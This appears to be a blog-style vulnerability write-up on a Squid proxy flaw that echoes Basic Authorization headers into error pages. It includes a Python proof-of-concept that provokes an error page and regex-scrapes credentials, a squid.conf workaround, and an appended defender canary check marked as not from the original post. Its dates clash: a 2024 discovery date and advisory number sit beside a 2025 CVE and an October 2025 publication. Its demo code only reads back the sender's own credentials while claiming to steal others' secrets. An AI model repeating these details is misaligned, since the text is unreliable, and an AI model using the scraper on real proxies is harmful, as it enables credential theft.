CVE-2025-62168 - Squid Proxy Authentication Leak – How Attackers Steal Your Secrets (With Example & Fix)
On June 10, 2024, a new security issue was discovered impacting Squid, the widely-used web caching proxy. Identified as CVE-2025-62168, this vulnerability allows attackers to steal sensitive authentication credentials that pass through the proxy — even if you have *not* enabled authentication in Squid. Let’s go through how it happens, why it’s dangerous, and how you can protect your environment.
What is Squid?
Squid is a popular, open-source proxy server for caching web content. Organizations use it to cut bandwidth usage, speed up web requests, and sometimes to enable security functions.
What is CVE-2025-62168?
CVE-2025-62168 is an information disclosure flaw found in Squid versions before 7.2. Here’s what happens:
- If Squid encounters an error serving a request, it may include the *client’s HTTP authentication credentials* in the error page data.
- A malicious script or attacker could trigger such errors and scrape those credentials from the error page.
Those credentials might be for internal webapps, APIs, or other sensitive backend connections.
This attack works even if Squid is not configured to require authentication. The flaw is in how Squid builds error responses.
An attacker can then use the stolen credentials to penetrate further into your network.
If someone can interact with your proxy — maybe via a web-facing service or a compromised script — they can extract credentials you thought were safe behind the scenes.
Attack Scenario
Imagine your backend web application is load-balanced behind Squid. A remote user (legit or not) can trick Squid into generating error messages for their requests. If those requests contain authentication headers (like Authorization: Basic ...), those headers may be sent back in the error response. A script running in a browser or by API automation can parse out those secrets.
Exploitation Example
Let's say you have Squid running (prior to 7.2), and a backend that uses Basic Authentication. Here’s a simplified attack sequence:
Step 1: The attacker crafts a request that will cause Squid to generate an error (e.g., requesting a non-existent backend).
Step 2: Squid tries to fulfill the request, fails, and generates an error page.
Step 3: If the client sent any Authorization header (browser or script), it can end up inside the error page data.
Step 4: The attacker snags the credentials from the reply.
Sample Attack Code
Here’s a basic Python snippet demonstrating this attack. It forges an Authorization header, sends a request that triggers an error, and parses the response to extract any leaked secrets:
```python
import requests
import base64
import re

# Credentials are base64-encoded user:password
user = "trusted-user"
password = "SuperSecret123"
b64_credentials = base64.b64encode(f'{user}:{password}'.encode()).decode()

# URL that will cause an error (e.g., non-existent page)
proxy_url = "http://squid-proxy:3128"
target_url = "http://backend.internal/does-not-exist"

proxies = {
    "http": proxy_url,
    "https": proxy_url,
}
headers = {
    "Authorization": f"Basic {b64_credentials}"
}

# Send the request through the proxy; the backend path does not exist, so Squid answers with an error page
resp = requests.get(target_url, headers=headers, proxies=proxies)
print("Error page content:\n", resp.text)

# Look for credential leakage in the error page (a Basic token is base64: letters, digits, +, / and = padding)
leaked = re.findall(r'Authorization: (Basic [A-Za-z0-9+/=]+)', resp.text)
if leaked:
    print("Leaked credentials found in error page:", leaked)
```
Result:
If vulnerable, the error page Squid returns might *embed your Authorization header*, which the script extracts.
Upgrade Squid
The vulnerability is fully patched in Squid 7.2.
- Upgrade to Squid 7.2 (Release Notes)
Workaround for Older Installations
If you cannot upgrade Squid right away, you can cut off the leak with a setting in your squid.conf:
```
# Add this to squid.conf to strip debug info (including accidental headers) from error mails/links:
email_err_data off
```
This disables debug info (which could include header data) in admin error messages Squid generates.
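After upgrading or applying the workaround, you will want to confirm that error pages no longer echo credentials. The following is an added example, not code from the original post or from the Squid project: it takes the body of an error page and a throw-away canary credential (the user and password values here are constructed) and reports whether the canary surfaced as a raw Basic token, as plaintext, or URL-encoded, and which usernames any echoed `Authorization: Basic` lines decode to.

```python
import base64
import binascii
import re
import urllib.parse
# Added example, not from the original post: a defender-side self-check that
# decides whether a proxy error page echoed the Basic credential sent with the
# request. Run it only with a throw-away canary credential, never a real one.
CANARY_USER = "canary-user"          # constructed, not a real account
CANARY_PASSWORD = "canary-pass-123"  # constructed, not a real secret

def basic_token(user: str, password: str) -> str:
    """Base64 token a client places after 'Basic ' in the Authorization header."""
    return base64.b64encode(f"{user}:{password}".encode()).decode()

def leak_forms(user: str, password: str) -> dict:
    """Shapes in which the canary might surface inside a response body."""
    pair = f"{user}:{password}"
    return {
        "basic_token": basic_token(user, password),
        "plaintext_pair": pair,
        "url_encoded_pair": urllib.parse.quote(pair, safe=""),
    }

def find_credential_leak(body: str, user: str, password: str) -> list:
    """Names of the canary forms present in body; an empty list means no leak seen."""
    return [name for name, needle in leak_forms(user, password).items()
            if needle in body]

def echoed_basic_users(body: str) -> list:
    """Usernames from any 'Authorization: Basic ...' line echoed verbatim in body.
    Undecodable tokens are skipped so a noisy page does not abort the check."""
    users = []
    for tok in re.findall(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", body):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        users.append(decoded.split(":", 1)[0])
    return users

# Constructed sample bodies: one error page that echoes the request headers
# (the failure mode this CVE describes), one that does not.
LEAKY_BODY = (
    "<h1>ERROR: The requested URL could not be retrieved</h1>\n"
    "<pre>GET http://backend.internal/does-not-exist HTTP/1.1\n"
    f"Authorization: Basic {basic_token(CANARY_USER, CANARY_PASSWORD)}\n"
    "Host: backend.internal</pre>\n"
)
CLEAN_BODY = "<h1>ERROR: The requested URL could not be retrieved</h1>\n"
```

To check a live proxy, send the canary through it to a non-existent backend path and pass `resp.text` to `find_credential_leak`; a non-empty result after the upgrade or workaround means the leak is still open.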
References
- Squid Security Advisory: SQUID-2024:7
- Debian Security Tracker - CVE-2025-62168
- Squid main site
TL;DR
- CVE-2025-62168 lets attackers grab internal HTTP credentials from Squid error pages, even if you don’t use proxy auth.
Timeline
Published on: 10/17/2025 17:15:49 UTC
Last modified on: 11/05/2025 17:15:45 UTC